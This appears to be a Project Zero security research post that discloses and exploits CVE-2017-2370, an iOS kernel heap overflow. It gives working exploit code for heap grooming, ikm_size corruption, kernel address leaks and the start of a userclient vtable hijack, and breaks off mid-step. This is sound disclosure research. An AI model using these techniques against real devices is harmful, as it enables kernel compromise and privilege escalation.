Tuesday, April 18, 2017

Exception-oriented exploitation on iOS

Posted by Ian Beer, Project Zero

This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing, and how to build live kernel introspection features using old kernel exploits.

It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:

/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),

Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel APIs. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.

Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code, complex mach traps often have to do lots of manual argument parsing, which is tricky to get right.

In iOS 10 a new entry appeared in the mach_traps table:

/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),

The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:

 struct mach_voucher_extract_attr_recipe_args {
   PAD_ARG_(mach_port_name_t, voucher_name);
   PAD_ARG_(mach_voucher_attr_key_t, key);
   PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
   PAD_ARG_(user_addr_t, recipe_size);
 };

A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.

Let’s walk through the trap code:

kern_return_t
mach_voucher_extract_attr_recipe_trap(
 struct mach_voucher_extract_attr_recipe_args *args)
{
 ipc_voucher_t voucher = IV_NULL;
 kern_return_t kr = KERN_SUCCESS;
 mach_msg_type_number_t sz = 0;

 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
   return KERN_MEMORY_ERROR;

copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.

 if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
   return MIG_ARRAY_TOO_LARGE;

mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.

 voucher = convert_port_name_to_voucher(args->voucher_name);
 if (voucher == IV_NULL)
   return MACH_SEND_INVALID_DEST;

convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.

 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
   /* keep small recipes on the stack for speed */
   uint8_t krecipe[sz];
   if (copyin(args->recipe, (void *)krecipe, sz)) {
     kr = KERN_MEMORY_ERROR;
       goto done;
   }
   kr = mach_voucher_extract_attr_recipe(voucher,
            args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

   if (kr == KERN_SUCCESS && sz > 0)
     kr = copyout(krecipe, (void *)args->recipe, sz);
 }

If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:

 else {
   uint8_t *krecipe = kalloc((vm_size_t)sz);
   if (!krecipe) {
     kr = KERN_RESOURCE_SHORTAGE;
     goto done;
   }

   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
     kfree(krecipe, (vm_size_t)sz);
     kr = KERN_MEMORY_ERROR;
     goto done;
   }

The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.

If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!

To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.

a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.

These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.

It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.

This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)

Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:

host_create_mach_voucher_trap:

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
 kfree(krecipes, (vm_size_t)args->recipes_size);
 kr = KERN_MEMORY_ERROR;
 goto done;
}

mach_voucher_extract_attr_recipe_trap:

 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
   kfree(krecipe, (vm_size_t)sz);
   kr = KERN_MEMORY_ERROR;
   goto done;
 }

My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:

error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                 ^~~~~~~~~~~~
                                                 recipe_size

Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.
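To make the mistake concrete, here is a minimal userspace sketch of the two lengths involved. The struct extract_args type and the three helper functions are hypothetical stand-ins for illustration, not XNU code; the only thing taken from the trap is that recipe_size holds the address of the size, while sz holds the size itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the trap's argument structure. As in the real
 * one, recipe_size is the *address* of the size, not the size itself. */
struct extract_args {
    uint64_t recipe;       /* user pointer to the recipe bytes */
    uint64_t recipe_size;  /* user pointer to a 32-bit size    */
};

/* Length the buggy large path hands to copyin: the pointer value. */
static uint64_t buggy_copy_len(const struct extract_args *args, uint32_t sz)
{
    assert(args != NULL);
    (void)sz;                   /* the validated size is never consulted */
    return args->recipe_size;
}

/* Length a corrected large path would use: the size copied in earlier. */
static uint64_t fixed_copy_len(const struct extract_args *args, uint32_t sz)
{
    assert(args != NULL);
    return sz;
}

/* Bytes written past the end of an sz-byte heap buffer for a given length. */
static uint64_t overflow_bytes(uint64_t copy_len, uint32_t sz)
{
    return copy_len > sz ? copy_len - sz : 0;
}
```

With a size of 0x400 stored at user address 0x2000, the buggy path asks copyin for 0x2000 bytes into a 0x400-byte allocation, while the corrected path asks for 0x400.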

Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipe_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches the unmapped source page and stop.
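The page-boundary part of this trick can be sketched with plain POSIX calls. The helper name place_before_unmapped_page is an assumption for illustration; it does not deal with the low-address requirement (that needs the pagezero_size linker option) and only shows how to make data end exactly where the mapping ends. Nothing stops a later mapping from landing in the freed page, so treat it as a sketch rather than a robust implementation.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Copies len bytes so that they end exactly at a page boundary and leaves
 * the following page unmapped. Returns a pointer to the first copied byte,
 * or NULL on failure. */
static void *place_before_unmapped_page(const void *data, size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    assert(len > 0 && len <= page);

    /* Reserve two adjacent pages in a single mapping. */
    uint8_t *base = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANON, -1, 0);
    if (base == MAP_FAILED)
        return NULL;

    /* Drop the second page so that a read running past the data faults. */
    if (munmap(base + page, page) != 0) {
        munmap(base, 2 * page);
        return NULL;
    }

    /* Place the data so its last byte is the last byte of the first page. */
    uint8_t *dst = base + page - len;
    memcpy(dst, data, len);
    return dst;
}
```

A copy that starts at the returned pointer can read exactly len bytes before it reaches the unmapped page.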

If the copyin fails the kalloced buffer will be immediately freed.

Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.

When I’m working on a new exploit I spend a lot of time looking for new primitives; for example, objects allocated on the heap which, if I could overflow into them, would let me cause a chain of interesting things to happen. Generally, interesting means that if I corrupt the object I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.

To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.

For anyone who has ever written a browser exploit this will be a familiar construct!

ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:

struct ipc_kmsg {
 mach_msg_size_t            ikm_size;
 struct ipc_kmsg            *ikm_next;
 struct ipc_kmsg            *ikm_prev;
 mach_msg_header_t          *ikm_header;
 ipc_port_t                 ikm_prealloc;
 ipc_port_t                 ikm_voucher;
 mach_msg_priority_t        ikm_qos;
 mach_msg_priority_t        ikm_qos_override;
 struct ipc_importance_elem *ikm_importance;
 queue_chain_t              ikm_inheritance;
};

This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?

Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:

void ipc_kmsg_free(ipc_kmsg_t kmsg);

This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.

This macro is used to set the ikm_size field:

#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
(kmsg)->ikm_size = (size);   \

This macro uses the ikm_size field to set the ikm_header pointer:

#define ikm_set_header(kmsg, mtsize)                       \
MACRO_BEGIN                                                \
(kmsg)->ikm_header = (mach_msg_header_t *)                 \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END

That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.

Finally there’s a check in ipc_kmsg_get_from_kernel:

 if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
   ip_unlock(dest_port);
   return MACH_SEND_TOO_LARGE;
 }

That’s using the ikm_size field to ensure that there’s enough space in the ipc_kmsg buffer for a message.

It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.

It’s about sending a message
ipc_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ipc_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.

Larger messages bypass this cache and are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:

 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
...  
 if (kmsg != IKM_NULL) {
   ikm_init(kmsg, max_expanded_size);
   ikm_set_header(kmsg, msg_and_trailer_size);
 }

 return(kmsg);

Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.

But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.

This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG APIs, for example. The function’s comment explains more:

* Routine: ipc_kmsg_get_from_kernel
* Purpose:
* First checks for a preallocated message
* reserved for kernel clients.  If not found -
* allocates a new kernel message buffer.
* Copies a kernel message to the message buffer.

Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ipc_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):

 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
   mach_msg_size_t max_desc = 0;
   
   kmsg = dest_port->ip_premsg;
   if (ikm_prealloc_inuse(kmsg)) {
     ip_unlock(dest_port);
     return MACH_SEND_NO_BUFFER;
   }

   if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
     ip_unlock(dest_port);
     return MACH_SEND_TOO_LARGE;
   }
   ikm_prealloc_set_inuse(kmsg, dest_port);
   ikm_set_header(kmsg, msg_and_trailer_size);
   ip_unlock(dest_port);
...  
 (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);

This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro which sets ikm_header such that the message will align to the end of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocated message buffer.
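The effect of trusting a corrupted size can be modelled entirely in userspace. The sketch below is not XNU code: the slot sizes, the 8-byte model header and the model_* names are assumptions chosen to keep the arithmetic small. It only mirrors the three steps above (check against the stored size, align to the presumed end of the buffer, memcpy) on a flat byte array standing in for adjacent heap allocations.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    SLOT_SIZE = 64,                    /* hypothetical size of one allocation */
    HDR_SIZE  = 8,                     /* model header: size field + padding  */
    BODY_SIZE = SLOT_SIZE - HDR_SIZE,  /* real capacity of the message buffer */
    HEAP_SIZE = 4 * SLOT_SIZE
};

/* A flat byte array standing in for a run of adjacent heap allocations. */
struct model_heap {
    uint8_t mem[HEAP_SIZE];
};

/* Reads the size field (the ikm_size stand-in) at the start of a slot. */
static uint32_t slot_size_field(const struct model_heap *h, int slot)
{
    uint32_t v;
    memcpy(&v, h->mem + slot * SLOT_SIZE, sizeof(v));
    return v;
}

static void set_slot_size_field(struct model_heap *h, int slot, uint32_t v)
{
    memcpy(h->mem + slot * SLOT_SIZE, &v, sizeof(v));
}

/* Models the preallocated path: trust the stored size, align the message to
 * the presumed end of the buffer, then copy it in. Returns the offset the
 * message was written to, or -1 if the size check rejects it. */
static int model_kernel_send(struct model_heap *h, int slot,
                             const void *msg, uint32_t len)
{
    uint32_t size = slot_size_field(h, slot);
    if (len > size)
        return -1;                     /* stands in for MACH_SEND_TOO_LARGE */

    uint32_t header = (uint32_t)(slot * SLOT_SIZE) + HDR_SIZE + size - len;
    assert(header + len <= (uint32_t)HEAP_SIZE);  /* keep the model in bounds */
    memcpy(h->mem + header, msg, len);
    return (int)header;
}
```

With an honest size of 56 an 8-byte message lands at offset 56, the last 8 bytes of slot 0. After bumping the stored size to 64 the same message lands at offset 64, which is the header of slot 1.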

ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.

This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.

Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel sends a message to us, we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, which is much harder!

There are only a handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contain a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.

When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to the global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.

routine thread_set_exception_ports(
        thread         : thread_act_t;
        exception_mask : exception_mask_t;
        new_port       : mach_port_t;
        behavior       : exception_behavior_t;
        new_flavor     : thread_state_flavor_t);

This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behavior defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.

Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general-purpose registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!

Some assembly required...
In our iOS Xcode project we can add a new assembly file and define a function load_regs_and_crash:

.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3

This function takes a pointer to a 240-byte buffer as its first argument, then loads the first 30 ARM64 general-purpose registers from that buffer, so that when it triggers a software interrupt via brk 0 and the kernel sends an exception message, that message contains the bytes from the input buffer in the same order.

We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.

I’m going to build my own kernel debugger (with printfs and hexdumps)
A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.

There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access! In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspection functions which allowed you to find process task structures and look up mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.

The first version of this new exploit was developed inside the mach_portal Xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.

Inside mach_portal I was able to find the address of a preallocated port buffer like this:

 // allocate an ipc_kmsg:
 kern_return_t err;
 mach_port_qos_t qos = {0};
 qos.prealloc = 1;
 qos.len = size;
 
 mach_port_name_t name = MACH_PORT_NULL;
 
 err = mach_port_allocate_full(mach_task_self(),
                               MACH_PORT_RIGHT_RECEIVE,
                               MACH_PORT_NULL,
                               &qos,
                               &name);

 uint64_t port = get_port(name);
 uint64_t prealloc_buf = rk64(port+0x88);
 printf("0x%016llx,\n", prealloc_buf);

get_port was part of the mach_portal exploit and is defined like this:

uint64_t get_port(mach_port_name_t port_name){
 return proc_port_name_to_port_ptr(our_proc, port_name);
}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
 uint64_t ports = get_proc_ipc_table(proc);
 uint32_t port_index = port_name >> 8;
 uint64_t port = rk64(ports + (0x18*port_index)); //ie_object
 return port;
}

uint64_t get_proc_ipc_table(uint64_t proc) {
 uint64_t task_t = rk64(proc + struct_proc_task_offset);
 uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
 uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
 return is_table;
}

These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
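The address arithmetic in proc_port_name_to_port_ptr can be checked in isolation. The sketch below assumes, as the snippet does, that the table index is the port name shifted right by 8 and that each table entry is 0x18 bytes. The helper names are hypothetical, and the description of the low byte as generation bits is my understanding of the Mach port name layout rather than something stated in the snippet.

```c
#include <assert.h>
#include <stdint.h>

#define IPC_ENTRY_SIZE 0x18u  /* entry stride used by the snippet above */

/* Index of the port's entry in the task's is_table. */
static uint32_t port_name_index(uint32_t name)
{
    return name >> 8;
}

/* Low byte of the name (assumed here to carry the generation bits). */
static uint32_t port_name_low_byte(uint32_t name)
{
    return name & 0xffu;
}

/* Kernel address of the entry whose first qword is read as ie_object. */
static uint64_t ipc_entry_address(uint64_t is_table, uint32_t name)
{
    assert(is_table != 0);
    return is_table + (uint64_t)IPC_ENTRY_SIZE * port_name_index(name);
}
```

For a port name of 0x1203 this gives index 0x12, so the entry sits 0x1b0 bytes into the table.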

I used this method with some trial and error to determine the correct value to overwrite ikm_size with, so that the controlled portion of an exception message aligns with the start of the next heap object.

get-where-what
The final piece of the puzzle is the ability to know where controlled data is; rather than write-what-where we want to get where what is.

One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.

One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks; the latest talk has details of the zone freelist randomization.

Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.

This means we can use code like this:

 int prealloc_size = 0x900; // kalloc.4096
 
 for (int i = 0; i < 2000; i++){
   prealloc_port(prealloc_size);
 }
 
 // these will be contiguous now, convenient!
 mach_port_t holder = prealloc_port(prealloc_size);
 mach_port_t first_port = prealloc_port(prealloc_size);
 mach_port_t second_port = prealloc_port(prealloc_size);
 
to get a heap layout in which the ipc_kmsg buffers belonging to holder, first_port and second_port sit next to each other in memory, in that order.

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but it works well enough for a research tool.

We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:

 // free the holder:
 mach_port_destroy(mach_task_self(), holder);

 // reallocate the holder and overflow out of it
 uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};
 do_overflow(0x1000, 64, overflow_bytes);
 
 // grab the holder again
 holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first_port to 0x1104.

After the ipc_kmsg structure has been filled in by ipc_kmsg_get_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:

void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                     ipc_kmsg_t       kmsg)
{
 ipc_kmsg_t first = queue->ikmq_base;
 ipc_kmsg_t last;

 if (first == IKM_NULL) {
   queue->ikmq_base = kmsg;
   kmsg->ikm_next = kmsg;
   kmsg->ikm_prev = kmsg;
 } else {
   last = first->ikm_prev;
   kmsg->ikm_next = first;
   kmsg->ikm_prev = last;
   first->ikm_prev = kmsg;
   last->ikm_next = kmsg;
 }
}

If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of message sends and receives will allow us to use this fact to read back the address of the second ipc_kmsg buffer:

 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
 send_prealloc_msg(first_port, valid_header, 8);
 
 // send a message to the second port
 // writing a pointer to itself in the prealloc buffer
 send_prealloc_msg(second_port, valid_header, 8);
 
 // receive on the first port, reading the header of the second:
 uint64_t* buf = receive_prealloc_msg(first_port);
 
 // this is the address of second_port's ipc_kmsg buffer
 kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:

void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
 struct thread_args* args = malloc(sizeof(struct thread_args));
 memset(args, 0, sizeof(struct thread_args));
 memcpy(args->buf, buf, n*8);
 
 args->exception_port = port;
 
 // start a new thread passing it the buffer and the exception port
 pthread_t t;
 pthread_create(&t, NULL, do_thread, (void*)args);
 
 // associate the pthread_t with the port
 // so that we can join the correct pthread
 // when we receive the exception message and it exits:
 kern_return_t err = mach_port_set_context(mach_task_self(),
                                           port,
                                           (mach_port_context_t)t);

 // wait until the message has actually been sent:
 while(!port_has_message(port)){;}
}

Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:

void* do_thread(void* arg) {
 struct thread_args* args = (struct thread_args*)arg;
 uint64_t buf[32];
 memcpy(buf, args->buf, sizeof(buf));
 
 kern_return_t err;
 err = thread_set_exception_ports(mach_thread_self(),
                                  EXC_MASK_ALL,
                                  args->exception_port,
                                  EXCEPTION_STATE,
                                  ARM_THREAD_STATE64);
 free(args);
 
 load_regs_and_crash(buf);
 return NULL;
}

do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.

At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer.

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?

Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.

We observed before that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting its header with one that keeps the ipc_kmsg valid and unused) then reading back the message sent to first_port we can determine the address of the second port’s ipc_kmsg buffer.
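The self-pointer behaviour is easy to confirm with a userspace model of the queue logic. The model_kmsg and model_queue types below are simplified stand-ins that keep only the two link fields; the enqueue body follows the ipc_kmsg_enqueue listing shown earlier.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-in for struct ipc_kmsg: only the link fields. */
struct model_kmsg {
    struct model_kmsg *next;   /* plays the role of ikm_next */
    struct model_kmsg *prev;   /* plays the role of ikm_prev */
};

/* Simplified stand-in for the port's message queue. */
struct model_queue {
    struct model_kmsg *base;   /* plays the role of ikmq_base */
};

/* Same logic as ipc_kmsg_enqueue: a circular doubly-linked list in which
 * the first message enqueued on an empty queue points back at itself. */
static void model_enqueue(struct model_queue *q, struct model_kmsg *m)
{
    assert(q != NULL && m != NULL);
    struct model_kmsg *first = q->base;

    if (first == NULL) {
        q->base = m;
        m->next = m;
        m->prev = m;
    } else {
        struct model_kmsg *last = first->prev;
        m->next = first;
        m->prev = last;
        first->prev = m;
        last->next = m;
    }
}
```

Reading the next field of a message that was enqueued on an empty queue therefore discloses the address of the message itself, which is exactly what the receive on first_port reads out of second_port’s buffer.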

read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.

For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.

Whoever developed that exploit had found that the IOKit OSSerializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.

In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.

Let’s free second_port and reallocate an IOKit userclient there:

 // send another message on first
 // writing a valid, safe header back over second
 send_prealloc_msg(first_port, valid_header, 8);
 
 // free second and get it reallocated as a userclient:
 mach_port_deallocate(mach_task_self(), second_port);
 mach_port_destroy(mach_task_self(), second_port);
 
 mach_port_t uc = alloc_userclient();
 
 // read back the start of the userclient buffer:
 buf = receive_prealloc_msg(first_port);

 // save a copy of the original object:
 memcpy(legit_object, buf, sizeof(legit_object));
 
 // this is the vtable for AGXCommandQueue
 uint64_t vtable = buf[0];

